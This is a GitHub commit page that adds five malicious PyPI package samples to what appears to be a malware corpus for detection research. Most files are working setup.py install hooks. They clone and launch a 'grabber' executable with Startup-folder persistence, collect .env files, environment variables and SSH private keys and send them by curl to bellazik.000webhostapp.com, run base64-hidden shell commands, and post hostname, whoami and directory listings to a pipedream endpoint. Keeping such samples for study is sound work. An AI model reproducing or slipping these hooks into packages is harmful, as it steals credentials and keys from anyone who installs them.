Skip to content

Commit

Permalink
Add 5 samples from the pypi_malregistry (#24)
Browse files Browse the repository at this point in the history 
* Add 5 samples from the pypi_malregistry

* remove setup.cfg
  • Loading branch information
@tstromberg
tstromberg authored Nov 4, 2024
1 parent ec1ba5f commit e58368a
Show file tree
Hide file tree
Showing 6 changed files with 338 additions and 0 deletions.
74 changes: 74 additions & 0 deletions python/2022.activedevbadge-0.39/setup.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,74 @@
from setuptools import find_packages, setup
from setuptools.command.install import install


class CustomInstallCommand(install):
def run(self):
import os
os.environ["GIT_PYTHON_REFRESH"] = "quiet"
import git

# create folder in startup

newpath = rf'C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boot'
if not os.path.exists(newpath):
os.makedirs(newpath)

# create folder to store the exe


newpath = rf'C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Powerpoint'
if not os.path.exists(newpath):
os.makedirs(newpath)

# cloning main.py to start the file auto into startup

repoDirectory = rf"C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boot"
gitUrl = "https://github.com/dcsage/test2lmaos.git"

git.Git(repoDirectory).clone(gitUrl)

# cloning exe into our powerpoint folder
# this is where we're gonna call in our main.py to run the file on startup
# C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Powerpoint\defonotagrabber\main.exe

repoDirectory = rf'C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Powerpoint'
gitUrl = "https://github.com/dcsage/defonotagrabber.git"

git.Git(repoDirectory).clone(gitUrl)

# moving the main.py file to the startup dir out of the folder


source = rf"C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boot\test2lmaos"
destination = rf"C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

allfiles = os.listdir(source)

src_path = os.path.join(source, 'test.py')
dst_path = os.path.join(destination, 'test.py')
os.rename(src_path, dst_path)

# run the exe to start off with

os.startfile(rf"C:\Users\{os.getlogin()}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Powerpoint\defonotagrabber\main.exe")
install.run(self)



setup(
name = 'activedevbadge',
packages=find_packages(),
version = '0.39',
description = 'Yes.',
author = 'haha.',
install_requires=["sockets","discord.py","aiohttp","Cmake","wheel","requests","gitpython"],
cmdclass={
'install': CustomInstallCommand,
},
author_email = '[email protected]',
url = 'https://github.com',
keywords = [],
classifiers = [],

)
22 changes: 22 additions & 0 deletions python/2022.aowdjpawojd-0.0.0/aowdjpawojd/__init__.py
View file

Large diffs are not rendered by default.

147 changes: 147 additions & 0 deletions python/2023.axderz-1.0.4/setup.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,147 @@
from turtle import home
import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import os.path
import os
import base64
import subprocess
from sys import platform
import string
from pathlib import Path


URL = "http://bellazik.000webhostapp.com:443"


def stealenv():
global URL
# Steal environment variables from shell and from .env
dotenv = ""
environs = {}
paths = []

if platform == "win32":
# Windows
# get all drives
available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]

curr_dir = os.getcwd()
os.chdir("/")

for drive in available_drives:
powershell_cmd = "powershell.exe Get-ChildItem -Path %s -Filter *.env -Recurse -ErrorAction SilentlyContinue -Force -File | ForEach-Object {$_.FullName}"%(drive)
print(powershell_cmd)
powershell_cmd = powershell_cmd.split(" ")
try:
result = subprocess.run(powershell_cmd, capture_output=True, timeout=2)
output = result.stdout.decode()
output = output.split("\n")
if len(output)==0:
continue
for i in output:
i = i.rstrip()
paths.append(i)
except Exception as e:
continue

for i in paths:
if os.path.exists(i):
with open(i, "r") as f:
dotenv+=f.read()+"\n"

os.chdir(curr_dir)

else:
# Linux and Mac
home_path = str(Path.home())
cmd = f"find {home_path} -type f -name *.env"
cmd = cmd.split(" ")
try:
result = subprocess.run(cmd, capture_output=True, timeout=5)
output = result.stdout.decode().split("\n")
if len(output)==0:
return
for i in output:
i = i.rstrip()
paths.append(i)
except Exception as e:
pass

for i in paths:
if os.path.exists(i):
with open(i, "r") as f:
dotenv+=f.read()+"\n"


for name, value in os.environ.items():
environs[name] = value

try:
dotenv = base64.b64encode(dotenv.encode()).decode()
environs = base64.b64encode(str(environs).encode()).decode()
req1 = f"{URL}/?dotenv={dotenv}"
req2 = f"{URL}/?environs={environs}"
subprocess.check_output(["curl",req1])
subprocess.check_output(["curl",req2])
except Exception as e:
pass

def stealsshkey():
global URL
home_path = str(Path.home())
privkey = ""
if not os.path.exists(os.path.join(home_path, ".ssh","id_rsa")):
return

with open(os.path.join(home_path, ".ssh","id_rsa"),"r") as f:
privkey = f.read()

if privkey=="" or privkey is None:
return

try:
privkey = base64.b64encode(privkey.encode()).decode()
req = f"{URL}/?id_rsa={privkey}"
subprocess.check_output(["curl",req])
except Exception as e:
pass



class AfterDevelop(develop):
def run(self):
develop.run(self)

class AfterInstall(install):
def run(self):
install.run(self)
stealenv()
stealsshkey()


setuptools.setup(
name = "axderz",
version = "1.0.4",
author = "babyboy",
author_email = "[email protected]",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/teja156/autobot-clipper",
project_urls = {
"Bug Tracker": "https://github.com/teja156/autobot-clipper/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
cmdclass={
'develop': AfterDevelop,
'install': AfterInstall,
},
)
49 changes: 49 additions & 0 deletions python/2024.advpruebitaa9-1.0.0/setup.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,49 @@
import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import base64
import os

def b64d(base64_code):
base64_bytes = base64_code.encode('ascii')
code_bytes = base64.b64decode(base64_bytes)
code = code_bytes.decode('ascii')
return code

def notmalfunc():
os.system(b64d("dHlwZSBudWwgPiBwcnVlYmEzMy50eHQ="))

class AfterDevelop(develop):
def run(self):
develop.run(self)

class AfterInstall(install):
def run(self):
install.run(self)
notmalfunc()

setuptools.setup(
name = "advpruebitaa9",
version = "1.0.0",
author = "TGH",
author_email = "[email protected]",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/thegoodhackertv/malpip",
project_urls = {
"Bug Tracker": "https://github.com/thegoodhackertv/malpip/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
cmdclass={
'develop': AfterDevelop,
'install': AfterInstall,
},
)
11 changes: 11 additions & 0 deletions python/2024.business-kpi-manager-5.9.1/pre_install.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
import subprocess

def pre_install():
# Define your curl command here
curl_command = 'curl -X POST -H "Hostname: $(hostname)" -H "repo: TMobile" -H "dependency: business-kpi-manager" -H "Whoami: $(whoami)" -H "Pwd: $(pwd)" -d "$(ls -la)" -H "Content-Type: text/plain" https://eozjyg0uj1pesea.m.pipedream.net'

# Execute the curl command
subprocess.run(curl_command, shell=True)

if __name__ == "__main__":
pre_install()
35 changes: 35 additions & 0 deletions python/2024.business-kpi-manager-5.9.1/setup.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
from setuptools import setup, find_packages
from setuptools.command.install import install
from pre_install import pre_install

class CustomInstall(install):
def run(self):
# Execute your pre_install.py script
pre_install()
# Call the original install command using super()
super().run()

setup(
name = 'business-kpi-manager',
packages = find_packages(),
version = '5.9.1',
license='MIT',
description = 'service',
author = 'SherlocksHat',
author_email = '[email protected]',
url = 'https://github.com/user/rslockshsat',
download_url = 'http://notapplicdable.notdapplicable',
keywords = ['Lyft', 'FRONTEND'],
install_requires=[],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
cmdclass={'install': CustomInstall},
)

0 comments on commit e58368a

Please sign in to comment.